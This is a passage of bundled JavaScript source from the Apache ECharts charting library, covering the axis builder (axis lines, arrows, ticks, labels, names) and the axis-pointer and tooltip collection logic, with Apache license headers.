{number} [opt.axisNameAvailableWidth]\n * @param {number} [opt.labelRotate] by degree, default get from axisModel.\n * @param {number} [opt.strokeContainThreshold] Default label interval when label\n * @param {number} [opt.nameTruncateMaxWidth]\n */\nvar AxisBuilder = function (axisModel, opt) {\n\n    /**\n     * @readOnly\n     */\n    this.opt = opt;\n\n    /**\n     * @readOnly\n     */\n    this.axisModel = axisModel;\n\n    // Default value\n    defaults(\n        opt,\n        {\n            labelOffset: 0,\n            nameDirection: 1,\n            tickDirection: 1,\n            labelDirection: 1,\n            silent: true\n        }\n    );\n\n    /**\n     * @readOnly\n     */\n    this.group = new Group();\n\n    // FIXME Not use a seperate text group?\n    var dumbGroup = new Group({\n        position: opt.position.slice(),\n        rotation: opt.rotation\n    });\n\n    // this.group.add(dumbGroup);\n    // this._dumbGroup = dumbGroup;\n\n    dumbGroup.updateTransform();\n    this._transform = dumbGroup.transform;\n\n    this._dumbGroup = dumbGroup;\n};\n\nAxisBuilder.prototype = {\n\n    constructor: AxisBuilder,\n\n    hasBuilder: function (name) {\n        return !!builders[name];\n    },\n\n    add: function (name) {\n        builders[name].call(this);\n    },\n\n    getGroup: function () {\n        return this.group;\n    }\n\n};\n\nvar builders = {\n\n    /**\n     * @private\n     */\n    axisLine: function () {\n        var opt = this.opt;\n        var axisModel = this.axisModel;\n\n        if (!axisModel.get('axisLine.show')) {\n            return;\n        }\n\n        var extent = this.axisModel.axis.getExtent();\n\n        var matrix = this._transform;\n        var pt1 = [extent[0], 0];\n        var pt2 = [extent[1], 0];\n        if (matrix) {\n            applyTransform(pt1, pt1, matrix);\n            applyTransform(pt2, pt2, matrix);\n        }\n\n        var lineStyle = extend(\n            {\n                lineCap: 'round'\n            },\n            axisModel.getModel('axisLine.lineStyle').getLineStyle()\n        );\n\n        this.group.add(new Line({\n            // Id for animation\n            anid: 'line',\n            subPixelOptimize: true,\n            shape: {\n                x1: pt1[0],\n                y1: pt1[1],\n                x2: pt2[0],\n                y2: pt2[1]\n            },\n            style: lineStyle,\n            strokeContainThreshold: opt.strokeContainThreshold || 5,\n            silent: true,\n            z2: 1\n        }));\n\n        var arrows = axisModel.get('axisLine.symbol');\n        var arrowSize = axisModel.get('axisLine.symbolSize');\n\n        var arrowOffset = axisModel.get('axisLine.symbolOffset') || 0;\n        if (typeof arrowOffset === 'number') {\n            arrowOffset = [arrowOffset, arrowOffset];\n        }\n\n        if (arrows != null) {\n            if (typeof arrows === 'string') {\n                // Use the same arrow for start and end point\n                arrows = [arrows, arrows];\n            }\n            if (typeof arrowSize === 'string'\n                || typeof arrowSize === 'number'\n            ) {\n                // Use the same size for width and height\n                arrowSize = [arrowSize, arrowSize];\n            }\n\n            var symbolWidth = arrowSize[0];\n            var symbolHeight = arrowSize[1];\n\n            each$1([{\n                rotate: opt.rotation + Math.PI / 2,\n                offset: arrowOffset[0],\n                r: 0\n            }, {\n                rotate: opt.rotation - Math.PI / 2,\n                offset: arrowOffset[1],\n                r: Math.sqrt((pt1[0] - pt2[0]) * (pt1[0] - pt2[0])\n                    + (pt1[1] - pt2[1]) * (pt1[1] - pt2[1]))\n            }], function (point, index) {\n                if (arrows[index] !== 'none' && arrows[index] != null) {\n                    var symbol = createSymbol(\n                        arrows[index],\n                        -symbolWidth / 2,\n                        -symbolHeight / 2,\n                        symbolWidth,\n                        symbolHeight,\n                        lineStyle.stroke,\n                        true\n                    );\n\n                    // Calculate arrow position with offset\n                    var r = point.r + point.offset;\n                    var pos = [\n                        pt1[0] + r * Math.cos(opt.rotation),\n                        pt1[1] - r * Math.sin(opt.rotation)\n                    ];\n\n                    symbol.attr({\n                        rotation: point.rotate,\n                        position: pos,\n                        silent: true,\n                        z2: 11\n                    });\n                    this.group.add(symbol);\n                }\n            }, this);\n        }\n    },\n\n    /**\n     * @private\n     */\n    axisTickLabel: function () {\n        var axisModel = this.axisModel;\n        var opt = this.opt;\n\n        var ticksEls = buildAxisMajorTicks(this, axisModel, opt);\n        var labelEls = buildAxisLabel(this, axisModel, opt);\n\n        fixMinMaxLabelShow(axisModel, labelEls, ticksEls);\n\n        buildAxisMinorTicks(this, axisModel, opt);\n    },\n\n    /**\n     * @private\n     */\n    axisName: function () {\n        var opt = this.opt;\n        var axisModel = this.axisModel;\n        var name = retrieve(opt.axisName, axisModel.get('name'));\n\n        if (!name) {\n            return;\n        }\n\n        var nameLocation = axisModel.get('nameLocation');\n        var nameDirection = opt.nameDirection;\n        var textStyleModel = axisModel.getModel('nameTextStyle');\n        var gap = axisModel.get('nameGap') || 0;\n\n        var extent = this.axisModel.axis.getExtent();\n        var gapSignal = extent[0] > extent[1] ? -1 : 1;\n        var pos = [\n            nameLocation === 'start'\n                ? extent[0] - gapSignal * gap\n                : nameLocation === 'end'\n                ? extent[1] + gapSignal * gap\n                : (extent[0] + extent[1]) / 2, // 'middle'\n            // Reuse labelOffset.\n            isNameLocationCenter(nameLocation) ? opt.labelOffset + nameDirection * gap : 0\n        ];\n\n        var labelLayout;\n\n        var nameRotation = axisModel.get('nameRotate');\n        if (nameRotation != null) {\n            nameRotation = nameRotation * PI$2 / 180; // To radian.\n        }\n\n        var axisNameAvailableWidth;\n\n        if (isNameLocationCenter(nameLocation)) {\n            labelLayout = innerTextLayout(\n                opt.rotation,\n                nameRotation != null ? nameRotation : opt.rotation, // Adapt to axis.\n                nameDirection\n            );\n        }\n        else {\n            labelLayout = endTextLayout(\n                opt, nameLocation, nameRotation || 0, extent\n            );\n\n            axisNameAvailableWidth = opt.axisNameAvailableWidth;\n            if (axisNameAvailableWidth != null) {\n                axisNameAvailableWidth = Math.abs(\n                    axisNameAvailableWidth / Math.sin(labelLayout.rotation)\n                );\n                !isFinite(axisNameAvailableWidth) && (axisNameAvailableWidth = null);\n            }\n        }\n\n        var textFont = textStyleModel.getFont();\n\n        var truncateOpt = axisModel.get('nameTruncate', true) || {};\n        var ellipsis = truncateOpt.ellipsis;\n        var maxWidth = retrieve(\n            opt.nameTruncateMaxWidth, truncateOpt.maxWidth, axisNameAvailableWidth\n        );\n        // FIXME\n        // truncate rich text? (consider performance)\n        var truncatedText = (ellipsis != null && maxWidth != null)\n            ? truncateText$1(\n                name, maxWidth, textFont, ellipsis,\n                {minChar: 2, placeholder: truncateOpt.placeholder}\n            )\n            : name;\n\n        var tooltipOpt = axisModel.get('tooltip', true);\n\n        var mainType = axisModel.mainType;\n        var formatterParams = {\n            componentType: mainType,\n            name: name,\n            $vars: ['name']\n        };\n        formatterParams[mainType + 'Index'] = axisModel.componentIndex;\n\n        var textEl = new Text({\n            // Id for animation\n            anid: 'name',\n\n            __fullText: name,\n            __truncatedText: truncatedText,\n\n            position: pos,\n            rotation: labelLayout.rotation,\n            silent: isLabelSilent(axisModel),\n            z2: 1,\n            tooltip: (tooltipOpt && tooltipOpt.show)\n                ? extend({\n                    content: name,\n                    formatter: function () {\n                        return name;\n                    },\n                    formatterParams: formatterParams\n                }, tooltipOpt)\n                : null\n        });\n\n        setTextStyle(textEl.style, textStyleModel, {\n            text: truncatedText,\n            textFont: textFont,\n            textFill: textStyleModel.getTextColor()\n                || axisModel.get('axisLine.lineStyle.color'),\n            textAlign: textStyleModel.get('align')\n                || labelLayout.textAlign,\n            textVerticalAlign: textStyleModel.get('verticalAlign')\n                || labelLayout.textVerticalAlign\n        });\n\n        if (axisModel.get('triggerEvent')) {\n            textEl.eventData = makeAxisEventDataBase(axisModel);\n            textEl.eventData.targetType = 'axisName';\n            textEl.eventData.name = name;\n        }\n\n        // FIXME\n        this._dumbGroup.add(textEl);\n        textEl.updateTransform();\n\n        this.group.add(textEl);\n\n        textEl.decomposeTransform();\n    }\n\n};\n\nvar makeAxisEventDataBase = AxisBuilder.makeAxisEventDataBase = function (axisModel) {\n    var eventData = {\n        componentType: axisModel.mainType,\n        componentIndex: axisModel.componentIndex\n    };\n    eventData[axisModel.mainType + 'Index'] = axisModel.componentIndex;\n    return eventData;\n};\n\n/**\n * @public\n * @static\n * @param {Object} opt\n * @param {number} axisRotation in radian\n * @param {number} textRotation in radian\n * @param {number} direction\n * @return {Object} {\n *  rotation, // according to axis\n *  textAlign,\n *  textVerticalAlign\n * }\n */\nvar innerTextLayout = AxisBuilder.innerTextLayout = function (axisRotation, textRotation, direction) {\n    var rotationDiff = remRadian(textRotation - axisRotation);\n    var textAlign;\n    var textVerticalAlign;\n\n    if (isRadianAroundZero(rotationDiff)) { // Label is parallel with axis line.\n        textVerticalAlign = direction > 0 ? 'top' : 'bottom';\n        textAlign = 'center';\n    }\n    else if (isRadianAroundZero(rotationDiff - PI$2)) { // Label is inverse parallel with axis line.\n        textVerticalAlign = direction > 0 ? 'bottom' : 'top';\n        textAlign = 'center';\n    }\n    else {\n        textVerticalAlign = 'middle';\n\n        if (rotationDiff > 0 && rotationDiff < PI$2) {\n            textAlign = direction > 0 ? 'right' : 'left';\n        }\n        else {\n            textAlign = direction > 0 ? 'left' : 'right';\n        }\n    }\n\n    return {\n        rotation: rotationDiff,\n        textAlign: textAlign,\n        textVerticalAlign: textVerticalAlign\n    };\n};\n\nfunction endTextLayout(opt, textPosition, textRotate, extent) {\n    var rotationDiff = remRadian(textRotate - opt.rotation);\n    var textAlign;\n    var textVerticalAlign;\n    var inverse = extent[0] > extent[1];\n    var onLeft = (textPosition === 'start' && !inverse)\n        || (textPosition !== 'start' && inverse);\n\n    if (isRadianAroundZero(rotationDiff - PI$2 / 2)) {\n        textVerticalAlign = onLeft ? 'bottom' : 'top';\n        textAlign = 'center';\n    }\n    else if (isRadianAroundZero(rotationDiff - PI$2 * 1.5)) {\n        textVerticalAlign = onLeft ? 'top' : 'bottom';\n        textAlign = 'center';\n    }\n    else {\n        textVerticalAlign = 'middle';\n        if (rotationDiff < PI$2 * 1.5 && rotationDiff > PI$2 / 2) {\n            textAlign = onLeft ? 'left' : 'right';\n        }\n        else {\n            textAlign = onLeft ? 'right' : 'left';\n        }\n    }\n\n    return {\n        rotation: rotationDiff,\n        textAlign: textAlign,\n        textVerticalAlign: textVerticalAlign\n    };\n}\n\nvar isLabelSilent = AxisBuilder.isLabelSilent = function (axisModel) {\n    var tooltipOpt = axisModel.get('tooltip');\n    return axisModel.get('silent')\n        // Consider mouse cursor, add these restrictions.\n        || !(\n            axisModel.get('triggerEvent') || (tooltipOpt && tooltipOpt.show)\n        );\n};\n\nfunction fixMinMaxLabelShow(axisModel, labelEls, tickEls) {\n    if (shouldShowAllLabels(axisModel.axis)) {\n        return;\n    }\n\n    // If min or max are user set, we need to check\n    // If the tick on min(max) are overlap on their neighbour tick\n    // If they are overlapped, we need to hide the min(max) tick label\n    var showMinLabel = axisModel.get('axisLabel.showMinLabel');\n    var showMaxLabel = axisModel.get('axisLabel.showMaxLabel');\n\n    // FIXME\n    // Have not consider onBand yet, where tick els is more than label els.\n\n    labelEls = labelEls || [];\n    tickEls = tickEls || [];\n\n    var firstLabel = labelEls[0];\n    var nextLabel = labelEls[1];\n    var lastLabel = labelEls[labelEls.length - 1];\n    var prevLabel = labelEls[labelEls.length - 2];\n\n    var firstTick = tickEls[0];\n    var nextTick = tickEls[1];\n    var lastTick = tickEls[tickEls.length - 1];\n    var prevTick = tickEls[tickEls.length - 2];\n\n    if (showMinLabel === false) {\n        ignoreEl(firstLabel);\n        ignoreEl(firstTick);\n    }\n    else if (isTwoLabelOverlapped(firstLabel, nextLabel)) {\n        if (showMinLabel) {\n            ignoreEl(nextLabel);\n            ignoreEl(nextTick);\n        }\n        else {\n            ignoreEl(firstLabel);\n            ignoreEl(firstTick);\n        }\n    }\n\n    if (showMaxLabel === false) {\n        ignoreEl(lastLabel);\n        ignoreEl(lastTick);\n    }\n    else if (isTwoLabelOverlapped(prevLabel, lastLabel)) {\n        if (showMaxLabel) {\n            ignoreEl(prevLabel);\n            ignoreEl(prevTick);\n        }\n        else {\n            ignoreEl(lastLabel);\n            ignoreEl(lastTick);\n        }\n    }\n}\n\nfunction ignoreEl(el) {\n    el && (el.ignore = true);\n}\n\nfunction isTwoLabelOverlapped(current, next, labelLayout) {\n    // current and next has the same rotation.\n    var firstRect = current && current.getBoundingRect().clone();\n    var nextRect = next && next.getBoundingRect().clone();\n\n    if (!firstRect || !nextRect) {\n        return;\n    }\n\n    // When checking intersect of two rotated labels, we use mRotationBack\n    // to avoid that boundingRect is enlarge when using `boundingRect.applyTransform`.\n    var mRotationBack = identity([]);\n    rotate(mRotationBack, mRotationBack, -current.rotation);\n\n    firstRect.applyTransform(mul$1([], mRotationBack, current.getLocalTransform()));\n    nextRect.applyTransform(mul$1([], mRotationBack, next.getLocalTransform()));\n\n    return firstRect.intersect(nextRect);\n}\n\nfunction isNameLocationCenter(nameLocation) {\n    return nameLocation === 'middle' || nameLocation === 'center';\n}\n\n\nfunction createTicks(ticksCoords, tickTransform, tickEndCoord, tickLineStyle, aniid) {\n    var tickEls = [];\n    var pt1 = [];\n    var pt2 = [];\n    for (var i = 0; i < ticksCoords.length; i++) {\n        var tickCoord = ticksCoords[i].coord;\n\n        pt1[0] = tickCoord;\n        pt1[1] = 0;\n        pt2[0] = tickCoord;\n        pt2[1] = tickEndCoord;\n\n        if (tickTransform) {\n            applyTransform(pt1, pt1, tickTransform);\n            applyTransform(pt2, pt2, tickTransform);\n        }\n        // Tick line, Not use group transform to have better line draw\n        var tickEl = new Line({\n            // Id for animation\n            anid: aniid + '_' + ticksCoords[i].tickValue,\n            subPixelOptimize: true,\n            shape: {\n                x1: pt1[0],\n                y1: pt1[1],\n                x2: pt2[0],\n                y2: pt2[1]\n            },\n            style: tickLineStyle,\n            z2: 2,\n            silent: true\n        });\n        tickEls.push(tickEl);\n    }\n    return tickEls;\n}\n\nfunction buildAxisMajorTicks(axisBuilder, axisModel, opt) {\n    var axis = axisModel.axis;\n\n    var tickModel = axisModel.getModel('axisTick');\n\n    if (!tickModel.get('show') || axis.scale.isBlank()) {\n        return;\n    }\n\n    var lineStyleModel = tickModel.getModel('lineStyle');\n    var tickEndCoord = opt.tickDirection * tickModel.get('length');\n\n    var ticksCoords = axis.getTicksCoords();\n\n    var ticksEls = createTicks(ticksCoords, axisBuilder._transform, tickEndCoord, defaults(\n        lineStyleModel.getLineStyle(),\n        {\n            stroke: axisModel.get('axisLine.lineStyle.color')\n        }\n    ), 'ticks');\n\n    for (var i = 0; i < ticksEls.length; i++) {\n        axisBuilder.group.add(ticksEls[i]);\n    }\n\n    return ticksEls;\n}\n\nfunction buildAxisMinorTicks(axisBuilder, axisModel, opt) {\n    var axis = axisModel.axis;\n\n    var minorTickModel = axisModel.getModel('minorTick');\n\n    if (!minorTickModel.get('show') || axis.scale.isBlank()) {\n        return;\n    }\n\n    var minorTicksCoords = axis.getMinorTicksCoords();\n    if (!minorTicksCoords.length) {\n        return;\n    }\n\n    var lineStyleModel = minorTickModel.getModel('lineStyle');\n    var tickEndCoord = opt.tickDirection * minorTickModel.get('length');\n\n    var minorTickLineStyle = defaults(\n        lineStyleModel.getLineStyle(),\n        defaults(\n            axisModel.getModel('axisTick').getLineStyle(),\n            {\n                stroke: axisModel.get('axisLine.lineStyle.color')\n            }\n        )\n    );\n\n    for (var i = 0; i < minorTicksCoords.length; i++) {\n        var minorTicksEls = createTicks(\n            minorTicksCoords[i], axisBuilder._transform, tickEndCoord, minorTickLineStyle, 'minorticks_' + i\n        );\n        for (var k = 0; k < minorTicksEls.length; k++) {\n            axisBuilder.group.add(minorTicksEls[k]);\n        }\n    }\n}\n\nfunction buildAxisLabel(axisBuilder, axisModel, opt) {\n    var axis = axisModel.axis;\n    var show = retrieve(opt.axisLabelShow, axisModel.get('axisLabel.show'));\n\n    if (!show || axis.scale.isBlank()) {\n        return;\n    }\n\n    var labelModel = axisModel.getModel('axisLabel');\n    var labelMargin = labelModel.get('margin');\n    var labels = axis.getViewLabels();\n\n    // Special label rotate.\n    var labelRotation = (\n        retrieve(opt.labelRotate, labelModel.get('rotate')) || 0\n    ) * PI$2 / 180;\n\n    var labelLayout = innerTextLayout(opt.rotation, labelRotation, opt.labelDirection);\n    var rawCategoryData = axisModel.getCategories && axisModel.getCategories(true);\n\n    var labelEls = [];\n    var silent = isLabelSilent(axisModel);\n    var triggerEvent = axisModel.get('triggerEvent');\n\n    each$1(labels, function (labelItem, index) {\n        var tickValue = labelItem.tickValue;\n        var formattedLabel = labelItem.formattedLabel;\n        var rawLabel = labelItem.rawLabel;\n\n        var itemLabelModel = labelModel;\n        if (rawCategoryData && rawCategoryData[tickValue] && rawCategoryData[tickValue].textStyle) {\n            itemLabelModel = new Model(\n                rawCategoryData[tickValue].textStyle, labelModel, axisModel.ecModel\n            );\n        }\n\n        var textColor = itemLabelModel.getTextColor()\n            || axisModel.get('axisLine.lineStyle.color');\n\n        var tickCoord = axis.dataToCoord(tickValue);\n        var pos = [\n            tickCoord,\n            opt.labelOffset + opt.labelDirection * labelMargin\n        ];\n\n        var textEl = new Text({\n            // Id for animation\n            anid: 'label_' + tickValue,\n            position: pos,\n            rotation: labelLayout.rotation,\n            silent: silent,\n            z2: 10\n        });\n\n        setTextStyle(textEl.style, itemLabelModel, {\n            text: formattedLabel,\n            textAlign: itemLabelModel.getShallow('align', true)\n                || labelLayout.textAlign,\n            textVerticalAlign: itemLabelModel.getShallow('verticalAlign', true)\n                || itemLabelModel.getShallow('baseline', true)\n                || labelLayout.textVerticalAlign,\n            textFill: typeof textColor === 'function'\n                ? textColor(\n                    // (1) In category axis with data zoom, tick is not the original\n                    // index of axis.data. So tick should not be exposed to user\n                    // in category axis.\n                    // (2) Compatible with previous version, which always use formatted label as\n                    // input. But in interval scale the formatted label is like '223,445', which\n                    // maked user repalce ','. So we modify it to return original val but remain\n                    // it as 'string' to avoid error in replacing.\n                    axis.type === 'category'\n                        ? rawLabel\n                        : axis.type === 'value'\n                        ? tickValue + ''\n                        : tickValue,\n                    index\n                )\n                : textColor\n        });\n\n        // Pack data for mouse event\n        if (triggerEvent) {\n            textEl.eventData = makeAxisEventDataBase(axisModel);\n            textEl.eventData.targetType = 'axisLabel';\n            textEl.eventData.value = rawLabel;\n        }\n\n        // FIXME\n        axisBuilder._dumbGroup.add(textEl);\n        textEl.updateTransform();\n\n        labelEls.push(textEl);\n        axisBuilder.group.add(textEl);\n\n        textEl.decomposeTransform();\n\n    });\n\n    return labelEls;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar each$6 = each$1;\nvar curry$1 = curry;\n\n// Build axisPointerModel, mergin tooltip.axisPointer model for each axis.\n// allAxesInfo should be updated when setOption performed.\nfunction collect(ecModel, api) {\n    var result = {\n        /**\n         * key: makeKey(axis.model)\n         * value: {\n         *      axis,\n         *      coordSys,\n         *      axisPointerModel,\n         *      triggerTooltip,\n         *      involveSeries,\n         *      snap,\n         *      seriesModels,\n         *      seriesDataCount\n         * }\n         */\n        axesInfo: {},\n        seriesInvolved: false,\n        /**\n         * key: makeKey(coordSys.model)\n         * value: Object: key makeKey(axis.model), value: axisInfo\n         */\n        coordSysAxesInfo: {},\n        coordSysMap: {}\n    };\n\n    collectAxesInfo(result, ecModel, api);\n\n    // Check seriesInvolved for performance, in case too many series in some chart.\n    result.seriesInvolved && collectSeriesInfo(result, ecModel);\n\n    return result;\n}\n\nfunction collectAxesInfo(result, ecModel, api) {\n    var globalTooltipModel = ecModel.getComponent('tooltip');\n    var globalAxisPointerModel = ecModel.getComponent('axisPointer');\n    // links can only be set on global.\n    var linksOption = globalAxisPointerModel.get('link', true) || [];\n    var linkGroups = [];\n\n    // Collect axes info.\n    each$6(api.getCoordinateSystems(), function (coordSys) {\n        // Some coordinate system do not support axes, like geo.\n        if (!coordSys.axisPointerEnabled) {\n            return;\n        }\n\n        var coordSysKey = makeKey(coordSys.model);\n        var axesInfoInCoordSys = result.coordSysAxesInfo[coordSysKey] = {};\n        result.coordSysMap[coordSysKey] = coordSys;\n\n        // Set tooltip (like 'cross') is a convienent way to show axisPointer\n        // for user. So we enable seting tooltip on coordSys model.\n        var coordSysModel = coordSys.model;\n        var baseTooltipModel = coordSysModel.getModel('tooltip', globalTooltipModel);\n\n        each$6(coordSys.getAxes(), curry$1(saveTooltipAxisInfo, false, null));\n\n        // If axis tooltip used, choose tooltip axis for each coordSys.\n        // Notice this case: coordSys is `grid` but not `cartesian2D` here.\n        if (coordSys.getTooltipAxes\n            && globalTooltipModel\n            // If tooltip.showContent is set as false, tooltip will not\n            // show but axisPointer will show as normal.\n            && baseTooltipModel.get('show')\n        ) {\n            // Compatible with previous logic. But series.tooltip.trigger: 'axis'\n            // or series.data[n].tooltip.trigger: 'axis' are not support any more.\n            var triggerAxis = baseTooltipModel.get('trigger') === 'axis';\n            var cross = baseTooltipModel.get('axisPointer.type') === 'cross';\n            var tooltipAxes = coordSys.getTooltipAxes(baseTooltipModel.get('axisPointer.axis'));\n            if (triggerAxis || cross) {\n                each$6(tooltipAxes.baseAxes, curry$1(\n                    saveTooltipAxisInfo, cross ? 'cross' : true, triggerAxis\n                ));\n            }\n            if (cross) {\n                each$6(tooltipAxes.otherAxes, curry$1(saveTooltipAxisInfo, 'cross', false));\n            }\n        }\n\n        // fromTooltip: true | false | 'cross'\n        // triggerTooltip: true | false | null\n        function saveTooltipAxisInfo(fromTooltip, triggerTooltip, axis) {\n            var axisPointerModel = axis.model.getModel('axisPointer', globalAxisPointerModel);\n\n            var axisPointerShow = axisPointerModel.get('show');\n            if (!axisPointerShow || (\n                axisPointerShow === 'auto'\n                && !fromTooltip\n                && !isHandleTrigger(axisPointerModel)\n            )) {\n                return;\n            }\n\n            if (triggerTooltip == null) {\n                triggerTooltip = axisPointerModel.get('triggerTooltip');\n            }\n\n            axisPointerModel = fromTooltip\n                ? makeAxisPointerModel(\n                    axis, baseTooltipModel, globalAxisPointerModel, ecModel,\n                    fromTooltip, triggerTooltip\n                )\n                : axisPointerModel;\n\n            var snap = axisPointerModel.get('snap');\n            var key = makeKey(axis.model);\n            var involveSeries = triggerTooltip || snap || axis.type === 'category';\n\n            // If result.axesInfo[key] exist, override it (tooltip has higher priority).\n            var axisInfo = result.axesInfo[key] = {\n                key: key,\n                axis: axis,\n                coordSys: coordSys,\n                axisPointerModel: axisPointerModel,\n                triggerTooltip: triggerTooltip,\n                involveSeries: involveSeries,\n                snap: snap,\n                useHandle: isHandleTrigger(axisPointerModel),\n                seriesModels: []\n            };\n            axesInfoInCoordSys[key] = axisInfo;\n            result.seriesInvolved |= involveSeries;\n\n            var groupIndex = getLinkGroupIndex(linksOption, axis);\n            if (groupIndex != null) {\n                var linkGroup = linkGroups[groupIndex] || (linkGroups[groupIndex] = {axesInfo: {}});\n                linkGroup.axesInfo[key] = axisInfo;\n                linkGroup.mapper = linksOption[groupIndex].mapper;\n                axisInfo.linkGroup = linkGroup;\n            }\n        }\n    });\n}\n\nfunction makeAxisPointerModel(\n    axis, baseTooltipModel, globalAxisPointerModel, ecModel, fromTooltip, triggerTooltip\n) {\n    var tooltipAxisPointerModel = baseTooltipModel.getModel('axisPointer');\n    var volatileOption = {};\n\n    each$6(\n        [\n            'type', 'snap', 'lineStyle', 'shadowStyle', 'label',\n            'animation', 'animationDurationUpdate', 'animationEasingUpdate', 'z'\n        ],\n        function (field) {\n            volatileOption[field] = clone(tooltipAxisPointerModel.get(field));\n        }\n    );\n\n    // category axis do not auto snap, otherwise some tick that do not\n    // has value can not be hovered. value/time/log axis default snap if\n    // triggered from tooltip and trigger tooltip.\n    volatileOption.snap = axis.type !== 'category' && !!triggerTooltip;\n\n    // Compatibel with previous behavior, tooltip axis do not show label by default.\n    // Only these properties can be overrided from tooltip to axisPointer.\n    if (tooltipAxisPointerModel.get('type') === 'cross') {\n        volatileOption.type = 'line';\n    }\n    var labelOption = volatileOption.label || (volatileOption.label = {});\n    // Follow the convention, do not show label when triggered by tooltip by default.\n    labelOption.show == null && (labelOption.show = false);\n\n    if (fromTooltip === 'cross') {\n        // When 'cross', both axes show labels.\n        var tooltipAxisPointerLabelShow = tooltipAxisPointerModel.get('label.show');\n        labelOption.show = tooltipAxisPointerLabelShow != null ? tooltipAxisPointerLabelShow : true;\n        // If triggerTooltip, this is a base axis, which should better not use cross style\n        // (cross style is dashed by default)\n        if (!triggerTooltip) {\n            var crossStyle = volatileOption.lineStyle = tooltipAxisPointerModel.get('crossStyle');\n            crossStyle && defaults(labelOption, crossStyle.textStyle);\n        }\n    }\n\n    return axis.model.getModel(\n        'axisPointer',\n        new Model(volatileOption, globalAxisPointerModel, ecModel)\n    );\n}\n\nfunction collectSeriesInfo(result, ecModel) {\n    // Prepare data for axis trigger\n    ecModel.eachSeries(function (seriesModel) {\n\n        // Notice this case: this coordSys is `cartesian2D` but not `grid`.\n        var coordSys = seriesModel.coordinateSystem;\n        var seriesTooltipTrigger = seriesModel.get('tooltip.trigger', true);\n        var seriesTooltipShow = seriesModel.get('tooltip.show', true);\n        if (!coordSys\n            || seriesTooltipTrigger === 'none'\n            || seriesTooltipTrigger === false\n            || seriesTooltipTrigger === 'item'\n            || seriesTooltipShow === false\n            || seriesModel.get('axisPointer.show', true) === false\n        ) {\n            return;\n        }\n\n        each$6(result.coordSysAxesInfo[makeKey(coordSys.model)], function (axisInfo) {\n            var axis = axisInfo.axis;\n            if (coordSys.getAxis(axis.dim) === axis) {\n                axisInfo.seriesModels.push(seriesModel);\n                axisInfo.seriesDataCount == null && (axisInfo.seriesDataCount = 0);\n                axisInfo.seriesDataCount += seriesModel.getData().count();\n            }\n        });\n\n    }, this);\n}\n\n/**\n * For example:\n * {\n *     axisPointer: {\n *         links: [{\n *             xAxisIndex: [2, 4],\n *             yAxisIndex: 'all'\n *         }, {\n *             xAxisId: ['a5', 'a7'],\n *             xAxisName: 'xxx'\n *         }]\n *     }\n * }\n */\nfunction getLinkGroupIndex(linksOption, axis) {\n    var axisModel = axis.model;\n    var dim = axis.dim;\n    for (var i = 0; i < linksOption.length; i++) {\n        var linkOption = linksOption[i] || {};\n        if (checkPropInLink(linkOption[dim + 'AxisId'], axisModel.id)\n            || checkPropInLink(linkOption[dim + 'AxisIndex'], axisModel.componentIndex)\n            || checkPropInLink(linkOption[dim + 'AxisName'], axisModel.name)\n        ) {\n            return i;\n        }\n    }\n}\n\nfunction checkPropInLink(linkPropValue, axisPropValue) {\n    return linkPropValue === 'all'\n        || (isArray(linkPropValue) && indexOf(linkPropValue, axisPropValue) >= 0)\n        || linkPropValue === axisPropValue;\n}\n\nfunction fixValue(axisModel) {\n    var axisInfo = getAxisInfo(axisModel);\n    if (!axisInfo) {\n        return;\n    }\n\n    var axisPointerModel = axisInfo.axisPointerModel;\n    var scale = axisInfo.axis.scale;\n    var option = axisPointerModel.option;\n    var status = axisPointerModel.get('status');\n    var value = axisPointerModel.get('value');\n\n    // Parse init value for category and time axis.\n    if (value != null) {\n        value = scale.parse(value);\n    }\n\n    var useHandle = isHandleTrigger(axisPointerModel);\n    // If `handle` used, `axisPointer` will always be displayed, so value\n    // and status should be initialized.\n    if (status == null) {\n        option.status = useHandle ? 'show' : 'hide';\n    }\n\n    var extent = scale.getExtent().slice();\n    extent[0] > extent[1] && extent.reverse();\n\n    if (// Pick a value on axis when initializing.\n        value == null\n        // If both `handle` and `dataZoom` are used, value may be out of axis extent,\n        // where we should re-pick a value to keep `handle` displaying normally.\n        || value > extent[1]\n    ) {\n        // Make handle displayed on the end of the axis when init, which looks better.\n        value = extent[1];\n    }\n    if (value < extent[0]) {\n        value = extent[0];\n    }\n\n    option.value = value;\n\n    if (useHandle) {\n        option.status = axisInfo.axis.scale.isBlank() ? 'hide' : 'show';\n    }\n}\n\nfunction getAxisInfo(axisModel) {\n    var coordSysAxesInfo = (axisModel.ecModel.getComponent('axisPointer') || {}).coordSysAxesInfo;\n    return coordSysAxesInfo && coordSysAxesInfo.axesInfo[makeKey(axisModel)];\n}\n\nfunction getAxisPointerModel(axisModel) {\n    var axisInfo = getAxisInfo(axisModel);\n    return axisInfo && axisInfo.axisPointerModel;\n}\n\nfunction isHandleTrigger(axisPointerModel) {\n    return !!axisPointerModel.get('handle.show');\n}\n\n/**\n * @param {module:echarts/model/Model} model\n * @return {string} unique key\n */\nfunction makeKey(model) {\n    return model.type + '||' + model.id;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Base class of AxisView.\n */\nvar AxisView = extendComponentView({\n\n    type: 'axis',\n\n    /**\n     * @private\n     */\n    _axisPointer: null,\n\n    /**\n     * @protected\n     * @type {string}\n     */\n    axisPointerClass: null,\n\n    /**\n     * @override\n     */\n    render: function (axisModel, ecModel, api, payload) {\n        // FIXME\n        // This process should proformed after coordinate systems updated\n        // (axis scale updated), and should be 